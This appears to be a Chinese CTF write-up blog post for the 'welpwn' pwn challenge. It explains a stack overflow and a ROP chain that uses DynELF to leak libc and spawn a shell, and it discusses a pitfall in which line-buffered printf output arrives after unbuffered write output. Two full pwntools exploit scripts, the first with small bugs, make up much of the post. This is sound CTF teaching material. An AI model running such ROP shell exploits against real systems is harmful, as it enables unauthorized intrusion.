[pwn]关于printf输出时机的坑

最新推荐文章于 2024-01-27 16:17:28 发布
最新推荐文章于 2024-01-27 16:17:28 发布
阅读量8.3k 收藏 3
点赞数 3
分类专栏: 二进制 ctf # ctf-pwn 文章标签: 安全 二进制安全 ctf pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Breeze_CAT/article/details/100086973
版权
二进制 同时被 3 个专栏收录
56 篇文章 17 订阅
订阅专栏
ctf
30 篇文章 3 订阅
订阅专栏
ctf-pwn
25 篇文章 4 订阅
订阅专栏

关于printf输出时机的坑

今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。
welpwn详细writeup

题目地址:welpwn

首先查看一下安全策略:
在这里插入图片描述
保护很少,然后看一下代码逻辑:
在这里插入图片描述
read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑:
在这里插入图片描述
s2只有16个字节,但却复制了一个0x400字节的字符串,必然会有溢出。找到了溢出点,就可以考虑利用思路,但题目本身并没有给出libc版本,那么我们需要使用DynELF将system的地址泄漏出来。但**需要注意的是,这里的复制函数遇到\x00就会停止,而我们如果输入64位地址必然会出现\x00,所以不能直接在输入中构造ROP。**通过调试查看栈结构,发现echo的返回地址下面紧接着就是之前read读入的串的开头:
在这里插入图片描述
也就是说,我们可以使用4个pop接一个ret的返回地址覆盖echo的返回地址,然后将下面read读入的24个A和这个地址弹出,然后返回到下面构造的ROP上,而这个题中有通用gadget:
在这里插入图片描述
再回顾一下整个程序的逻辑,首先输出“welcome”,然后我们输入内容,然后进入echo将我们输入的内容拷贝到s2中,这里存在溢出,然后echo中调用printf将s2(我们输入的内容)输出,然后返回(到我们劫持的地址),那么我构造了leak函数如下:

from pwn import *

p=process('./b39a59bc51fb45d8be9d478246bd00b8')
elf=ELF('./b39a59bc51fb45d8be9d478246bd00b8')
write_plt=elf.symbols['write']
read_got=elf.got['read']
write_got=elf.got['write']
read_plt=elf.symbols['read']
start_addr=0x0400630
pop4_addr=0x040089c
pop6_addr=0x040089a
mov_addr=0x0400880
def leak(address):
    print p.recvuntil('RCTF\n')
    payload='A'*24+p64(pop4_addr)+p64(pop6_addr)+p64(0)+p64(1)\
    +p64(write_got)+p64(8)+p64(addr)+p64(1)+p64(mov_addr)\
    +'A'*56+p64(start_addr)
    payload=payload.ljust(1024,'A')
    p.send(payload1)
    p.recvuntil('A'*24)  #输出会在24个A之后再接三个字符(pop4的地址)
    p.recv(3)  #再接收三个
    data=p.recv(8)  #write打印的地址
    print "%x => %s" % (addr, (data or '').encode('hex'))
    return data
d=DynELF(leak,elf=ELF('./b39a59bc51fb45d8be9d478246bd00b8'))
sys_addr=d.lookup('system','libc')

最后执行之后发现代码执行不动了:
在这里插入图片描述
使用python一步一步查看发现:
在这里插入图片描述
什么情况,8字节的地址先输出,然后输出返回到start之后重新执行时输出的Welcome,最后才输出AAAA,也就是说,第二遍程序都开始执行了,第一遍的echo之中的AAAA还没输出。

这个问题出现的原因是:
在这里插入图片描述
在这里插入图片描述
AAA是用printf输出的,Welcome和地址是用write输出的。这里涉及到printf的特性。**printf是行缓冲函数,只有满了一行才马上打印,write在用户态没有缓冲,所以直接输出。**这里printf等到第二遍程序执行到我们输入的地方,也就是被输入打断时才输出。既然知道了错误的原理,就很容易构造利用代码了:

from pwn import *

p=process('./b39a59bc51fb45d8be9d478246bd00b8')
elf=ELF('./b39a59bc51fb45d8be9d478246bd00b8')
write_plt=elf.symbols['write']
read_got=elf.got['read']
write_got=elf.got['write']
read_plt=elf.symbols['read']
start_addr=0x0400630
pop4_addr=0x040089c
pop6_addr=0x040089a
mov_addr=0x0400880
prdi_addr=0x04008a3
binsh_addr=0x601070

def leak(addr):
    print p.recv()
  payload='A'*24+p64(pop4_addr)+p64(pop6_addr)+p64(0)+p64(1)+p64(write_got)+p64(8)+p64(addr)+p64(1)+p64(mov_addr)+'A'*56+p64(start_addr)
    payload=payload.ljust(1022,'C')
    p.send(payload)
    data=p.recv(8)
    print "%x => %s" % (addr, (data or '').encode('hex'))
    return data

d=DynELF(leak,elf=ELF('./b39a59bc51fb45d8be9d478246bd00b8'))
sys_addr=d.lookup('system','libc')
print hex(sys_addr)
print p.recv()
payload='A'*24+p64(pop4_addr)+p64(pop6_addr)+p64(0)+p64(1)+p64(read_got)+p64(8)+p64(binsh_addr)+p64(0)+p64(mov_addr)+'A'*56+p64(prdi_addr)+p64(binsh_addr)+p64(sys_addr)+'a'*8
payload=payload.ljust(1024,'A')
p.send(payload)
p.sendline('/bin/sh\x00')
p.interactive()

成功。
在这里插入图片描述
总结一下,虽说最后利用代码和思路都很简单,没什么绕弯子,但如果不知道printf的输出时机,有没有仔细调试,就会很烦。细节真的很重要!

breezeO_o
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF-PWNpwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1075
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
CTF-PWN-printf(实验吧|格式化字符漏洞)
SuperGate的博客
02-01 3249
首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。 首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。 这个时候我们发现get_file函数中显然有一个格式化字符漏洞。 这种漏洞会导致我们可以控制任意内存的...
Pwnprintf漏洞
weixin_52553215的博客
03-10 1101
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 537
printf 在C语言中,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其中Fomat String是其第一个参数,我们一般称之为格式化字符串 printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行对应,将格式化字符串中的特定子串,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器中获取参数并与符号说明相匹配,然
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 389
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
PWN.rar_PWN
09-24
文件列表中的“PWN输出占空比可变的方波”可能包含了实现这个功能的具体代码文件,比如头文件、源代码文件、配置文件等。通过这些文件,开发者可以了解到如何与PGA硬件交互,如何设置和控制占空比,以及如何在Keil ...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
[PWN][基础篇]printf漏洞介绍
网络安全知识分享
03-20 5105
printf漏洞介绍1、概念2、漏洞成因 1、概念 printf接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定的子字符串进行对应,将格式化字符串中的特定字串,解析为相应的参与值。格式化字符串就是%这种。 2、漏洞成因 printf函数在执行时,首先进行格式化字符串的解析–从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上,那么 ,如果格式化字符串中的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,就会造成泄漏。 而本书,p
pwn学习资料整理——x64中的printf回显漏洞
recover517的博客
08-04 373
利用printf打印栈中内容 B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。 IDA伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-30h] BYREF char buf[16]; // [rsp+20h] [rbp-10h] BYREF setvbuf(stdin, 0L
hctf[pwn]babyprintf_ver2
九层台
11-15 806
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg> print $rbx + $rax $1 = 0x555555756011 pwndbg> x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
PWN整数溢出与格式化字符串newstarCTF2023
最新发布
m0_74312867的博客
01-27 409
我什么都不会/(ㄒoㄒ)/~~
[PWN][基础篇]如何利用printf漏洞突破canary保护
网络安全知识分享
03-21 4013
如何利用printf漏洞突破canary保护 使用的实例代码如下 为了配合本次实例的教学,大家在编译时,不加pie保护,加cannary保护,整个的流程就是,分析程序之后,编写exp,利用printf漏洞(填充func函数,使其返回地址为exploit函数)来突破canary并且覆盖ret。 之后使用gdb开文件,查看func函数 来自英语白痴的小tip: 我们可以大概搞清楚func的流程,就是先read,然后printf,然后read,就是这样子。 我们下断就下到printf这里,我输入的测试用例是
实验吧-溢出-printf
leeham的博客
09-09 2376
实验吧-溢出-printf printf题目与CCTF-2016-pwn3几乎一样,不同的是,使用的libc和用户的username不同,其他的原理基本都相同。 在解出这道题目之前,首先先了解了CCTF-pwn3-2016这道题目的解题思路并且自己达到了拿到本地shell的目的。 关于原题的write-up可参考: CCTF pwn3格式化字符串漏洞详细writeup 关于本题中拿到本地...
[PWN]——格式化字符串漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 2159
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
pwn入门笔记(4)——如何利用printf漏洞突破canary保护
weixin_45551695的博客
07-29 437
实例分析 编译printf2.c ,要加canary保护 输入 写exp,利用printf漏洞来突破canary 并且覆盖ret #include<stdio.h> void exploit() { system("/bin/sh"); } void func() { char str[0x20]; read(0, str, 0x50); printf(str); read(0, str, 0x50); } int main() { func()
pwn printf 参数
08-18
pwn中,利用printf函数的参数可以是格式化字符串中的占位符和对应的实际值。常见的格式化字符串占位符包括: - %s: 用于输出字符串。 - %d: 用于输出有符号十进制整数。 - %u: 用于输出无符号十进制整数。 - %x, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值